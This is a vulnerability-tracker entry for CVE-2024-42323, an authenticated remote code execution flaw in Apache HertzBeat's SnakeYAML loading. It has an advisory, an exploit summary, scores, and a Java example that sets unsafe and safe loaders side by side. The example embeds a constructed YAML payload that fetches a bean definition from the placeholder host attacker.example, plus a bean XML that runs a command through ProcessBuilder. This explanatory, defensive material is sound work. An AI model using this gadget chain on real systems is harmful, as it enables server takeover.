CVE-2024-42323

HIGH

Apache HertzBeat < 1.6.0 - Authenticated Remote Code Execution via SnakeYAML Deserialization

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2024-42323. PoCs published by forwjm.

AI-analyzed exploit summary: The repository contains a working PoC for CVE-2024-42323. The payload is YAML that SnakeYAML deserializes (unsafe default constructor, CWE-502) into a Spring application context built from an attacker-controlled XML bean definition; that bean definition instantiates `java.lang.ProcessBuilder` to run an arbitrary command (the PoC uses `cat /flag`). The weakness is HertzBeat's use of an unrestricted SnakeYAML loader on user-supplied input; Spring's XML bean support is only the gadget that turns object construction into command execution.

Description

Unsafe SnakeYAML deserialization in Apache HertzBeat (incubating) allows a malicious XML bean definition to be loaded, leading to remote code execution. This vulnerability can only be exploited by authorized (authenticated) attackers. This issue affects Apache HertzBeat (incubating) before 1.6.0. Users are recommended to upgrade to version 1.6.0, which fixes the issue.
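The following is an added example, not code from this page, the PoC repository or the HertzBeat project. It places the vulnerable `new Yaml().load()` pattern beside the `SafeConstructor` form and embeds constructed YAML and bean-definition strings that show the shape of the gadget chain described above: a `!!` tag naming a Spring `ClassPathXmlApplicationContext`, which loads an XML bean definition that instantiates `ProcessBuilder`. The exact tag and XML the PoC uses are not stated on this page; what is shown is the classic SnakeYAML-to-Spring chain. It assumes the SnakeYAML 2.x API (`SafeConstructor(LoaderOptions)`); the host `attacker.example`, the class name `YamlLoadDemo` and the method names are placeholders, and the HertzBeat endpoint that reached the unsafe loader is not named here.

```java
import java.util.Map;

import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.ConstructorException;
import org.yaml.snakeyaml.constructor.SafeConstructor;

/**
 * Vulnerable vs. hardened SnakeYAML loading. Constructed example: the YAML and
 * XML strings below illustrate the payload shape, they are not the PoC's files.
 */
public class YamlLoadDemo {

    // Benign config of the kind a monitoring app might accept (constructed).
    static final String BENIGN_YAML = "name: demo\ninterval: 30\n";

    // Attacker-shaped YAML: a "!!" tag naming a Spring class whose constructor
    // takes a config location. The host is a placeholder, not a real server.
    static final String MALICIOUS_YAML =
        "!!org.springframework.context.support.ClassPathXmlApplicationContext"
        + " [\"http://attacker.example/bean.xml\"]";

    // What such a bean.xml looks like (constructed): Spring instantiates
    // ProcessBuilder with the listed arguments and calls start() as init-method.
    static final String BEAN_XML =
        "<beans xmlns=\"http://www.springframework.org/schema/beans\">\n"
        + "  <bean id=\"pb\" class=\"java.lang.ProcessBuilder\" init-method=\"start\">\n"
        + "    <constructor-arg>\n"
        + "      <list><value>cat</value><value>/flag</value></list>\n"
        + "    </constructor-arg>\n"
        + "  </bean>\n"
        + "</beans>\n";

    /** Vulnerable: the default Constructor resolves "!!some.Class" tags and
     *  instantiates that class through its public constructor. */
    static Object loadUnsafe(String yaml) {
        return new Yaml().load(yaml);
    }

    /** Hardened: SafeConstructor builds only core YAML types (scalars, lists,
     *  maps) and throws ConstructorException for any other tag. */
    static Object loadSafe(String yaml) {
        LoaderOptions opts = new LoaderOptions();
        opts.setAllowDuplicateKeys(false);
        return new Yaml(new SafeConstructor(opts)).load(yaml);
    }

    public static void main(String[] args) {
        Map<?, ?> cfg = (Map<?, ?>) loadSafe(BENIGN_YAML);
        System.out.println("safe loader, benign input: " + cfg);

        try {
            loadSafe(MALICIOUS_YAML);
            System.out.println("unexpected: class tag was accepted");
        } catch (ConstructorException e) {
            System.out.println("safe loader rejected class tag: " + e.getMessage());
        }

        // loadUnsafe(MALICIOUS_YAML) is deliberately not invoked: with
        // spring-context on the classpath it would fetch bean.xml from the URL
        // and execute the ProcessBuilder bean it defines.
        System.out.println("bean definition the unsafe path would load:\n" + BEAN_XML);
    }
}
```

Compile and run with `snakeyaml` on the classpath; the unsafe path is shown but never executed. `SafeConstructor` is the right fix when the input is plain configuration data. When an application needs typed objects from YAML, SnakeYAML 2.x instead lets you keep `Constructor` and restrict which global tags may be resolved through `LoaderOptions.setTagInspector(...)` with an explicit allow-list of classes; any tag naming a Spring context, `ProcessBuilder` or similar must stay outside that list.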

Exploits (1)

github WORKING POC
by forwjm · poc
https://github.com/forwjm/CVE-2024-42323

Classification
Working PoC (90%)
Attack type: RCE
Complexity: Trivial
Reliability: Reliable
Target: Apache HertzBeat < 1.6.0 (a Spring-based application; the Spring XML bean gadget is generic, the unsafe YAML loading is HertzBeat's)
Authentication: required (CVSS PR:L; the vendor advisory states the issue can only be exploited by authorized attackers)
Prerequisites: valid HertzBeat credentials · access to the HertzBeat functionality that passes user-supplied YAML to SnakeYAML · the malicious XML bean definition must be reachable by the server when the Spring context loads it
devstral-2 · analyzed May 24, 2026

References (3)

Core References
Mailing List, Vendor Advisory
https://lists.apache.org/thread/r0c4tost4bllqc1n9q6rmzs1slgsq63t
Mailing List, Vendor Advisory
https://lists.apache.org/thread/dwpwm572sbwon1mknlwhkpbom2y7skbx

Scores

CVSS v3 8.8
EPSS 0.7555
EPSS Percentile 98.9%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable no
Technical Impact total

Details

CWE
CWE-502
Status published
Products (1)
apache/hertzbeat < 1.6.0
Published Sep 21, 2024
Tracked Since Feb 18, 2026